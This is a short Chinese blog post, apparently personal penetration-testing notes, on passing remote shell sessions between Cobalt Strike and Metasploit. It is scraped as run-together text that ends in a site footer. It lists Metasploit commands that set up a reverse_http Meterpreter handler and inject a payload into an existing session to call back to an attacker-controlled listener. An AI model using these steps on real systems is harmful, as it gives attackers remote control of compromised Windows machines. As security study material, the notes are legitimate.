cs传shell给msf1.msf 1234use exploit/multi/handlerset payload windows/meterpreter/reverse_httpset lhost 192.168.110.130 set lport 4444 2.cs创建监听器,名字为msf 选择Foreign http 3.cs执行监听器 spawn msf msf传shell给cs cs创建监听器 选择的是http方式连接 msf派生shell 先把会话放到后台,设置如下。因为cs上设置的为http连接,所以我们下边payload也要对应的设置为reverse_tcp 12345678910#派生一个新的shell给cs,那么msf里面用到的exploit是use exploit/windows/local/payload_inject set payload windows/meterpreter/reverse_http#禁止产生一个新的handlerset disablepayloadhandler true#设置ip端口为cs监听的set LHOST IPset LPORT 端口set session 3run msf cs author: John Doe link: http://example.com/2022/05/12/msf和cs联动/ Copyright notice: All articles on this website, unless otherwise stated, adopt CC BY-NC-ND 4.0 reprint policy. If reproduced, please indicate source! Prev: 内网渗透学习笔记 Next: kali重新获取ip 你的赏识是我前进的动力 支付宝 微信